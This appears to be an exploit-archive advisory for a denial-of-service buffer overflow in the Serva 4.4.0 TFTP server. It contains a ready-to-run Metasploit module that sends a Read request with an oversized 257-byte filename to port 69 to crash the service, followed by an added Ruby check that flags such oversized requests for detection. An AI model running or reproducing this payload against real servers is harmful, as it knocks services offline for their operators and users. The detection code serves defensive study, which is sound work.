Serva 4.4.0 TFTP Remote Buffer Overflow

2021.11.24
Credit: Yehia Elghaly
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: Serva 4.4.0 TFTP Server Remote Buffer Overflow (Metasploit)
# Date: 2021-11-23
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://www.vercot.com/
# Software Link : https://www.vercot.com/~serva/download/Serva_Community_v4.4.0-21081411.zip
# Tested Version: 4.4.0
# Tested on: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos
  Rank = ExcellentRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Serva 4.4.0 TFTP Remote Buffer Overflow',
      'Description'    => %q{
        The Serva TFTP server version 4.4.0 can be brought down by sending
        a special Read request.
      },
      'Author'         => 'Yehia Elghaly',
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2021-11-23'))

    register_options([Opt::RPORT(69)])
  end

  def run
    connect_udp
    print_status("Sending Read request...")

    sploit  = "\x00\x01"   # TFTP opcode 1: Read Request (RRQ)
    sploit += "A" * 257    # filename field, 257 bytes
    sploit += "\x00"       # NUL terminator for the filename
    sploit += "netascii"   # transfer mode
    sploit += "\x00"       # NUL terminator for the mode

    udp_sock.put(sploit)
    disconnect_udp
  end
end
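
For detection, the request above stands out by the length of its filename field. The following is an added example, not part of the original advisory or of Metasploit: a Ruby check that parses a UDP payload sent to port 69 and flags malformed or oversized read/write requests. The 255-byte limit, the function name and the sample payloads are assumptions chosen for illustration.

```ruby
# Added example: classify a TFTP request payload for logging or filtering.
MAX_FILENAME = 255                       # assumed policy limit, not from the advisory
KNOWN_MODES  = %w[netascii octet mail].freeze

# Returns a Hash describing the request, or nil if the payload is not RRQ/WRQ.
def inspect_tftp_request(payload)
  data = payload.b                       # work on raw bytes
  return nil if data.bytesize < 4

  opcode = data[0, 2].unpack1('n')       # big-endian 16-bit opcode
  return nil unless [1, 2].include?(opcode)   # 1 = RRQ, 2 = WRQ

  # Body layout: filename NUL mode NUL. Limit -1 keeps trailing empty fields.
  fields   = data[2..].split("\x00".b, -1)
  filename = fields[0] || ''.b
  mode     = (fields[1] || '').downcase

  reasons = []
  reasons << 'filename not NUL-terminated' if fields.size < 2
  reasons << 'empty filename' if filename.empty?
  if filename.bytesize > MAX_FILENAME
    reasons << "filename length #{filename.bytesize} exceeds #{MAX_FILENAME}"
  end
  reasons << 'unknown transfer mode' unless KNOWN_MODES.include?(mode)
  reasons << 'mode not NUL-terminated' if fields.size < 3

  { opcode: opcode, filename_len: filename.bytesize, mode: mode,
    suspicious: !reasons.empty?, reasons: reasons }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample payloads: a normal read request and one with a
  # 257-byte filename field, the shape the advisory describes.
  samples = {
    'normal RRQ'    => "\x00\x01" + 'boot.img' + "\x00" + 'octet' + "\x00",
    'oversized RRQ' => "\x00\x01" + ('A' * 257) + "\x00" + 'netascii' + "\x00"
  }
  samples.each do |label, pkt|
    r = inspect_tftp_request(pkt)
    puts "#{label}: suspicious=#{r[:suspicious]} #{r[:reasons].join('; ')}"
  end
end
```
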


Copyright 2021, cxsecurity.com